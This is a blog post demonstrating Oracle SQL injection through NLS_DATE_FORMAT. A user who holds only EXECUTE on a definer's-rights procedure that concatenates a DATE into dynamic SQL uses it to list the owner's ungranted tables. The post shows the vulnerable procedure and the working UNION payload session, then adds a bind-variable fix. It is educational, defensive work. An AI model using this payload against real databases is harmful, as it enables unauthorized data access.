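Today I was reading something from Tom that mentioned a very interesting point: with nothing more than EXECUTE granted on a procedure, another user can perform SQL injection. Something to watch out for from now on. Here is my experiment.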
[oracle@aix ~]$ sqlplus anbob/anbob
SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011
Copyright (c) 1982, 2007, Oracle. All Rights Reserved.
Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE 10.2.0.4.0 Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production
SQL> select * from all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- -------------------
ZYY 1099 2011-08-30 11:41:03
GZPX_DB 1070 2011-08-30 11:41:01
GIAF 1069 2011-08-30 11:41:01
DEAN_TRAIN 1068 2011-08-30 11:41:01
...
75 rows selected.
SQL> select * from tab;
TNAME TABTYPE CLUSTERID
------------------------------ ------- ----------
TEST TABLE
TESTA TABLE
TESTB TABLE
TESTBLOB TABLE
TESTC TABLE
TESTIMG TABLE
TESTKDR TABLE
TESTXY TABLE
8 rows selected.
SQL> create or replace procedure badboy( p_date in date )
2 as
3 l_rec all_users%rowtype;
4 c sys_refcursor;
5 l_query long;
6 begin
7 l_query := 'select * from all_users where created = ''' ||p_date ||'''';
8 dbms_output.put_line( l_query );
9 open c for l_query;
10 for i in 1 .. 10
11 loop
12 fetch c into l_rec;
13 exit when c%notfound;
14 dbms_output.put_line( l_rec.username || '.....' );
15 end loop;
16 close c;
17 end;
18 /
Procedure created.
SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'
PL/SQL procedure successfully completed.
SQL> grant execute on badboy to icme;
Grant succeeded.
SQL> conn icme/icme
Connected.
SQL> set serveroutput on
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'
PL/SQL procedure successfully completed.
SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
Session altered.
SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....
PL/SQL procedure successfully completed.
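Look familiar? These are of course anbob's tables, and none of them were granted to icme. In the same way, the columns can be obtained from all_column, and with that, part of the data in those tables can be retrieved...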
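Why the altered session works: badboy concatenates p_date into the query text, so the DATE is implicitly converted to a string with the caller's NLS_DATE_FORMAT, and the procedure then executes that text with anbob's (definer's) privileges. The following is an added example, not part of the original post, of the same procedure with the date passed as a bind variable; the name goodboy is hypothetical.

```sql
-- Added example: hardened counterpart of badboy (the name goodboy is hypothetical).
create or replace procedure goodboy( p_date in date )
as
    l_rec   all_users%rowtype;
    c       sys_refcursor;
    l_query varchar2(200);
begin
    -- The statement text is a constant: nothing supplied by the caller,
    -- and nothing derived from the caller's session settings, is
    -- concatenated into it.
    l_query := 'select * from all_users where created = :d';
    dbms_output.put_line( l_query );

    -- p_date is passed as a DATE bind value. There is no implicit
    -- date-to-string conversion here, so NLS_DATE_FORMAT never becomes
    -- part of the SQL that runs with the definer's privileges.
    open c for l_query using p_date;
    for i in 1 .. 10
    loop
        fetch c into l_rec;
        exit when c%notfound;
        dbms_output.put_line( l_rec.username || '.....' );
    end loop;
    close c;
end;
/
```

Where a literal really has to be concatenated, converting with an explicit mask such as to_char(p_date, 'YYYY-MM-DD HH24:MI:SS') also removes the dependency on the session's NLS_DATE_FORMAT.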